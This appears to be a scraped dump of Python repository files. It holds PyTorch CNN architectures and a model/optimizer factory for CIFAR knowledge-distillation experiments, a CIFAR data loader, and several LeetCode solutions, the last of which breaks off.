x = self.classifier(h)
return x
def get_vgg_layers(config, batch_norm):
layers = []
in_channels = 3
for c in config:
assert c == 'M' or isinstance(c, int)
if c == 'M':
layers += [nn.MaxPool2d(kernel_size=2)]
else:
conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(c), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = c
return nn.Sequential(*layers)
def vgg11_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg11_config, batch_norm=True), class_num)
return model
def vgg13_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg13_config, batch_norm=True), class_num)
return model
def vgg16_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg16_config, batch_norm=True), class_num)
return model
def vgg19_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg19_config, batch_norm=True), kwargs['num_classes'])
return model
class AlexNet(nn.Module):
def __init__(self, num_classes):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(in_channels=3,
out_channels=64,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
nn.Conv2d(in_channels=64,
out_channels=192,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
nn.Conv2d(in_channels=192,
out_channels=384,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=384,
out_channels=256,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=256,
out_channels=256,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
)
self.avgpool = nn.AdaptiveAvgPool2d((6, 6))
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 6 * 6, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
# forward: forward propagation
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.classifier(x)
return x
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, kernel_size=5)
self.conv2 = nn.Conv2d(6, 16, kernel_size=5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2)
x = x.view(x.size(0), -1)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1, y2, y3, y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class MobileNet_Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(MobileNet_Block, self).__init__()
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes,
bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
cfg = [64, (128, 2), 128, (256, 2), 256, (512, 2), 512, 512, 512, 512, 512, (1024, 2), 1024]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
out_planes = x if isinstance(x, int) else x[0]
stride = 1 if isinstance(x, int) else x[1]
layers.append(MobileNet_Block(in_planes, out_planes, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class fire(nn.Module):
def __init__(self, inplanes, squeeze_planes, expand_planes):
super(fire, self).__init__()
self.conv1 = nn.Conv2d(inplanes, squeeze_planes, kernel_size=1, stride=1)
self.bn1 = nn.BatchNorm2d(squeeze_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(squeeze_planes, expand_planes, kernel_size=1, stride=1)
self.bn2 = nn.BatchNorm2d(expand_planes)
self.conv3 = nn.Conv2d(squeeze_planes, expand_planes, kernel_size=3, stride=1, padding=1)
self.bn3 = nn.BatchNorm2d(expand_planes)
self.relu2 = nn.ReLU(inplace=True)
        # using MSR initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
out1 = self.conv2(x)
out1 = self.bn2(out1)
out2 = self.conv3(x)
out2 = self.bn3(out2)
out = torch.cat([out1, out2], 1)
out = self.relu2(out)
return out
class SqueezeNet(nn.Module):
def __init__(self):
super(SqueezeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 96, kernel_size=3, stride=1, padding=1) # 32
self.bn1 = nn.BatchNorm2d(96)
self.relu = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2) # 16
self.fire2 = fire(96, 16, 64)
self.fire3 = fire(128, 16, 64)
self.fire4 = fire(128, 32, 128)
self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2) # 8
self.fire5 = fire(256, 32, 128)
self.fire6 = fire(256, 48, 192)
self.fire7 = fire(384, 48, 192)
self.fire8 = fire(384, 64, 256)
self.maxpool3 = nn.MaxPool2d(kernel_size=2, stride=2) # 4
self.fire9 = fire(512, 64, 256)
self.conv2 = nn.Conv2d(512, 10, kernel_size=1, stride=1)
self.avg_pool = nn.AvgPool2d(kernel_size=4, stride=4)
self.softmax = nn.LogSoftmax(dim=1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool1(x)
x = self.fire2(x)
x = self.fire3(x)
x = self.fire4(x)
x = self.maxpool2(x)
x = self.fire5(x)
x = self.fire6(x)
x = self.fire7(x)
x = self.fire8(x)
x = self.maxpool3(x)
x = self.fire9(x)
x = self.conv2(x)
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
x = self.softmax(x)
return x
class ShuffleBlock(nn.Module):
def __init__(self, groups):
super(ShuffleBlock, self).__init__()
self.groups = groups
def forward(self, x):
'''Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]'''
N, C, H, W = x.size()
g = self.groups
return x.view(N, g, C // g, H, W).permute(0, 2, 1, 3, 4).reshape(N, C, H, W)
class Bottleneck(nn.Module):
def __init__(self, in_planes, out_planes, stride, groups):
super(Bottleneck, self).__init__()
self.stride = stride
mid_planes = out_planes // 4
g = 1 if in_planes == 24 else groups
self.conv1 = nn.Conv2d(in_planes, mid_planes, kernel_size=1, groups=g, bias=False)
self.bn1 = nn.BatchNorm2d(mid_planes)
self.shuffle1 = ShuffleBlock(groups=g)
self.conv2 = nn.Conv2d(mid_planes, mid_planes, kernel_size=3, stride=stride, padding=1, groups=mid_planes,
bias=False)
self.bn2 = nn.BatchNorm2d(mid_planes)
self.conv3 = nn.Conv2d(mid_planes, out_planes, kernel_size=1, groups=groups, bias=False)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 2:
self.shortcut = nn.Sequential(nn.AvgPool2d(3, stride=2, padding=1))
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.shuffle1(out)
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
res = self.shortcut(x)
out = F.relu(torch.cat([out, res], 1)) if self.stride == 2 else F.relu(out + res)
return out
class ShuffleNet(nn.Module):
def __init__(self, cfg):
super(ShuffleNet, self).__init__()
out_planes = cfg['out_planes']
num_blocks = cfg['num_blocks']
groups = cfg['groups']
self.conv1 = nn.Conv2d(3, 24, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(24)
self.in_planes = 24
self.layer1 = self._make_layer(out_planes[0], num_blocks[0], groups)
self.layer2 = self._make_layer(out_planes[1], num_blocks[1], groups)
self.layer3 = self._make_layer(out_planes[2], num_blocks[2], groups)
self.linear = nn.Linear(out_planes[2], 10)
def _make_layer(self, out_planes, num_blocks, groups):
layers = []
for i in range(num_blocks):
stride = 2 if i == 0 else 1
cat_planes = self.in_planes if i == 0 else 0
layers.append(Bottleneck(self.in_planes, out_planes - cat_planes, stride=stride, groups=groups))
self.in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ShuffleNetG2():
cfg = {
'out_planes': [200, 400, 800],
'num_blocks': [4, 8, 4],
'groups': 2
}
return ShuffleNet(cfg)
def ShuffleNetG3():
cfg = {
'out_planes': [240, 480, 960],
'num_blocks': [4, 8, 4],
'groups': 3
}
return ShuffleNet(cfg)
class Block(nn.Module):
'''expand + depthwise + pointwise + squeeze-excitation'''
def __init__(self, in_planes, out_planes, expansion, stride):
super(Block, self).__init__()
self.stride = stride
planes = expansion * in_planes
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=stride, padding=1, groups=planes, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 1 and in_planes != out_planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=1,
stride=1, padding=0, bias=False),
nn.BatchNorm2d(out_planes),
)
# SE layers
self.fc1 = nn.Conv2d(out_planes, out_planes//16, kernel_size=1)
self.fc2 = nn.Conv2d(out_planes//16, out_planes, kernel_size=1)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
shortcut = self.shortcut(x) if self.stride == 1 else out
# Squeeze-Excitation
w = F.avg_pool2d(out, out.size(2))
w = F.relu(self.fc1(w))
w = self.fc2(w).sigmoid()
out = out * w + shortcut
return out
class EfficientNet(nn.Module):
def __init__(self, cfg, num_classes=10):
super(EfficientNet, self).__init__()
self.cfg = cfg
self.conv1 = nn.Conv2d(3, 32, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
self.linear = nn.Linear(cfg[-1][1], num_classes)
def _make_layers(self, in_planes):
layers = []
for expansion, out_planes, num_blocks, stride in self.cfg:
strides = [stride] + [1]*(num_blocks-1)
for stride in strides:
layers.append(Block(in_planes, out_planes, expansion, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def EfficientNetB0():
# (expansion, out_planes, num_blocks, stride)
cfg = [(1, 16, 1, 2),
(6, 24, 2, 1),
(6, 40, 2, 2),
(6, 80, 3, 2),
(6, 112, 3, 1),
(6, 192, 4, 2),
(6, 320, 1, 2)]
return EfficientNet(cfg)
resnet_book = {
'8': resnet8_cifar,
'14': resnet14_cifar,
'20': resnet20_cifar,
'26': resnet26_cifar,
'32': resnet32_cifar,
'44': resnet44_cifar,
'56': resnet56_cifar,
'110': resnet110_cifar,
}
plane_cifar10_book = {
'2': ['Conv16', 'MaxPool', 'Conv16', 'MaxPool', 'FC10'],
'4': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'FC10'],
'6': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'FC10'],
'8': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool',
'Conv128', 'Conv128', 'MaxPool', 'FC64', 'FC10'],
'10': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'Conv256', 'Conv256', 'MaxPool', 'FC128', 'FC10'],
}
plane_cifar100_book = {
'2': ['Conv32', 'MaxPool', 'Conv32', 'MaxPool', 'FC100'],
'4': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'FC100'],
'6': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'FC100'],
'8': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'MaxPool', 'FC64', 'FC100'],
'10': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'Conv256', 'Conv256', 'MaxPool', 'FC512', 'FC100'],
}
vgg11_config = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
vgg13_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
vgg16_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512,
512, 'M']
vgg19_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M',
512, 512, 512, 512, 'M']
vgg_cifar10_book = {
'11': vgg11_cifar,
'13': vgg13_cifar,
'16': vgg16_cifar,
'19': vgg19_cifar,
}
def is_resnet(name):
"""
    Maps a model name to its architecture family; by convention, family names are prefixes,
    e.g. all resnet names start with 'resnet'.
    :param name: model name string, e.g. resnet110, plane2, vgg19
    :return: the architecture family prefix
"""
name = name.lower()
if name.startswith("resnet"):
return 'resnet'
elif name.startswith('plane'):
return 'plane'
elif name.startswith('alexnet'):
return 'alexnet'
elif name.startswith('vgg'):
return 'vgg'
elif name.startswith('resnext'):
return 'resnext'
elif name.startswith('lenet'):
return 'lenet'
elif name.startswith('googlenet'):
return 'googlenet'
elif name.startswith('mobilenet'):
return 'mobilenet'
elif name.startswith('squeezenet'):
return 'squeezenet'
elif name.startswith('shufflenet'):
return 'shufflenet'
elif name.startswith('efficientnetb0'):
return 'efficientnetb0'
def create_cnn_model(name, dataset="cifar100", total_epochs = 160, model_path = None, use_cuda = False):
"""
    Create a model for training, given the model name and dataset.
    :param name: name of the model, e.g. resnet110, resnet32, plane2, plane10, vgg19, lenet, ...
    :param dataset: dataset name, used to determine the output size of the last layer. Options are cifar10 and cifar100.
    :param total_epochs: total number of training epochs, used to place the LR scheduler milestones.
    :param model_path: optional path to a checkpoint to load weights (and, if present, optimizer/scheduler state) from.
    :param use_cuda: if truthy, move the model to GPU.
    :return: a (model, optimizer, scheduler) tuple
"""
num_classes = 100 if dataset == 'cifar100' else 10
model = None
scheduler = None
if is_resnet(name) == 'resnet':
resnet_size = name[6:]
resnet_model = resnet_book.get(resnet_size)(num_classes = num_classes)
model = resnet_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=1e-4)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs/2, total_epochs*3/4, total_epochs], gamma=0.1, last_epoch=-1)
# scheduler = MultiStepLR(optimizer, 5, total_epochs, [total_epochs/2, total_epochs*3/4, total_epochs], 0.1)
elif is_resnet(name) == 'plane':
plane_size = name[5:]
model_spec = plane_cifar10_book.get(plane_size) if num_classes == 10 else plane_cifar100_book.get(
plane_size)
plane_model = ConvNetMaker(model_spec)
model = plane_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9, weight_decay=1e-4)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, total_epochs*2, gamma=0.1, last_epoch=-1)
elif is_resnet(name) == 'vgg':
vgg_size = name[3:]
vgg_model = vgg_cifar10_book.get(vgg_size)(num_classes=num_classes)
model = vgg_model
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer)
elif is_resnet(name) == 'alexnet':
alexnet_model = AlexNet(num_classes)
model = alexnet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = ExponentialLR(optimizer, 10, total_epochs, last_epoch=-1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[total_epochs*3/8, total_epochs*3/4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'lenet':
lenet_model = LeNet()
model = lenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
elif is_resnet(name) == 'googlenet':
googlenet_model = GoogLeNet()
model = googlenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)
# scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs / 2, total_epochs * 3 / 4, total_epochs], gamma=0.1, last_epoch=-1)
# optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'mobilenet':
mobilenet_model = MobileNet()
model = mobilenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'squeezenet':
squeezenet_model = SqueezeNet()
model = squeezenet_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-4)
# optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs / 2, total_epochs * 3 / 4, total_epochs], gamma=0.1, last_epoch=-1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
elif is_resnet(name) == 'shufflenet':
shufflenet_type = name[10:]
if shufflenet_type == 'g2' or shufflenet_type == 'G2':
shufflenet_model = ShuffleNetG2()
else:
shufflenet_model = ShuffleNetG3()
model = shufflenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'efficientnetb0':
efficientnetb0_model = EfficientNetB0()
model = efficientnetb0_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-4)
# Assuming optimizer uses lr = 0.05 for all groups
# lr = 0.05 if epoch < 30
# lr = 0.005 if 30 <= epoch < 60
# lr = 0.0005 if 60 <= epoch < 90
# ...
# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=200, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
# copy to cuda if activated
if use_cuda:
model = model.cuda()
if model_path:
print(model_path)
checkpoint = torch.load(model_path)
if 'base-model' in checkpoint:
model.load_state_dict(checkpoint['base-model'])
elif 'state_dict' in checkpoint:
model.load_state_dict(checkpoint['state_dict'])
if 'scheduler' in checkpoint:
scheduler.load_state_dict(checkpoint['scheduler'])
if 'optimizer' in checkpoint:
optimizer.load_state_dict(checkpoint['optimizer'])
return model, optimizer, scheduler
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv(F.relu(self.bn(x)))
x = F.avg_pool2d(x, 2)
return x
class DenseNet(nn.Module):
def __init__(self, block, num_block, growth_rate=12, reduction=0.5, num_classes=10):
super(DenseNet, self).__init__()
self.growth_rate = growth_rate
num_planes = 2 * growth_rate
self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, num_block[0])
num_planes += num_block[0] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans1 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, num_block[1])
num_planes += num_block[1] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, num_block[2])
num_planes += num_block[2] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, num_block[3])
num_planes += num_block[3] * growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear = nn.Linear(num_planes, num_classes)
def _make_dense_layers(self, block, in_planes, num_block):
layers = []
for i in range(num_block):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.trans1(self.dense1(x))
x = self.trans2(self.dense2(x))
x = self.trans3(self.dense3(x))
x = self.dense4(x)
x = F.avg_pool2d(F.relu(self.bn(x)), 4)
x = x.view(x.size(0), -1)
x = self.linear(x)
return x
def DenseNet121():
return DenseNet(Bottleneck, [6, 12, 24, 16], growth_rate=32)
def DenseNet169():
return DenseNet(Bottleneck, [6, 12, 32, 32], growth_rate=32)
def DenseNet201():
return DenseNet(Bottleneck, [6, 12, 48, 32], growth_rate=32)
def DenseNet161():
return DenseNet(Bottleneck, [6, 12, 36, 24], growth_rate=48)
def densenet_cifar():
return DenseNet(Bottleneck, [6, 12, 24, 16], growth_rate=12)
# def load_checkpoint(model, checkpoint_path):
# """
# Loads weights from checkpoint
# :param model: a pytorch nn student
# :param str checkpoint_path: address/path of a file
# :return: pytorch nn student with weights loaded from checkpoint
# """
# model_ckp = torch.load(checkpoint_path)
# model.load_state_dict(model_ckp['model_state_dict'])
# return model
def count_parameters_in_MB(model):
return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if "auxiliary" not in name) / 1e6
``` |
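A short usage sketch for the factory above (assuming this module is importable as `addtional_models`; the variable names are illustrative):

```python
from addtional_models import ConvNetMaker, create_cnn_model, plane_cifar10_book

# Build a ResNet-20 for CIFAR-10 together with its SGD optimizer and MultiStepLR scheduler.
model, optimizer, scheduler = create_cnn_model("resnet20", dataset="cifar10",
                                               total_epochs=160, use_cuda=False)

# The "plane" models are built directly from layer-spec strings.
plane2 = ConvNetMaker(plane_cifar10_book['2'])  # Conv16 -> MaxPool -> Conv16 -> MaxPool -> FC10
```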
{
"source": "Joey61Liuyi/Teacher-Assistant-Knowledge-Distillation",
"score": 3
} |
#### File: Joey61Liuyi/Teacher-Assistant-Knowledge-Distillation/data_loader.py
```python
import torch
import torchvision
import torchvision.transforms as transforms
NUM_WORKERS = 2
def get_cifar(num_classes=100, dataset_dir='./data', batch_size=20, crop=False):
"""
:param num_classes: 10 for cifar10, 100 for cifar100
:param dataset_dir: location of datasets, default is a directory named 'data'
    :param batch_size: batch size, defaults to 20
    :param crop: whether to apply random crop and horizontal flip augmentation, defaults to False
    :return: train and test DataLoaders
"""
normalize = transforms.Normalize(mean=[0.507, 0.487, 0.441], std=[0.267, 0.256, 0.276])
simple_transform = transforms.Compose([transforms.ToTensor(), normalize])
if crop is True:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
else:
train_transform = simple_transform
if num_classes == 100:
trainset = torchvision.datasets.CIFAR100(root=dataset_dir, train=True,
download=True, transform=train_transform)
testset = torchvision.datasets.CIFAR100(root=dataset_dir, train=False,
download=True, transform=simple_transform)
else:
trainset = torchvision.datasets.CIFAR10(root=dataset_dir, train=True,
download=True, transform=train_transform)
testset = torchvision.datasets.CIFAR10(root=dataset_dir, train=False,
download=True, transform=simple_transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, num_workers=NUM_WORKERS,
pin_memory=True, shuffle=True)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, num_workers=NUM_WORKERS,
pin_memory=True, shuffle=False)
return trainloader, testloader
if __name__ == "__main__":
print("CIFAR10")
print(get_cifar(10))
print("---"*20)
print("---"*20)
print("CIFAR100")
print(get_cifar(100))
``` |
{
"source": "joey66666/Codeyard",
"score": 4
} |
#### File: Codeyard/Leetcode-cn/1002.查找共用字符.py
```python
class Solution:
def commonChars(self, words: List[str]) -> List[str]:
if not words:
return []
alphabet1 = [0] * 26
n = len(words)
res = []
for w in words[0]:
alphabet1[ord(w) - ord('a')] += 1
for i in range(1, n):
alphabet2 = [0] * 26
for w in words[i]:
alphabet2[ord(w) - ord('a')] += 1
for j in range(26):
alphabet1[j] = min(alphabet1[j], alphabet2[j])
for i in range(26):
while alphabet1[i] > 0:
res.append(chr(ord('a') + i))
alphabet1[i] -= 1
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/137.只出现一次的数字-ii.py
```python
class Solution:
def singleNumber(self, nums: List[int]) -> int:
dic = {}
for num in nums:
dic[num] = dic.get(num, 0) + 1
if dic[num] > 1:
continue
for d in dic:
if dic[d] == 1:
return d
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1436.旅行终点站.py
```python
class Solution:
def destCity(self, paths: List[List[str]]) -> str:
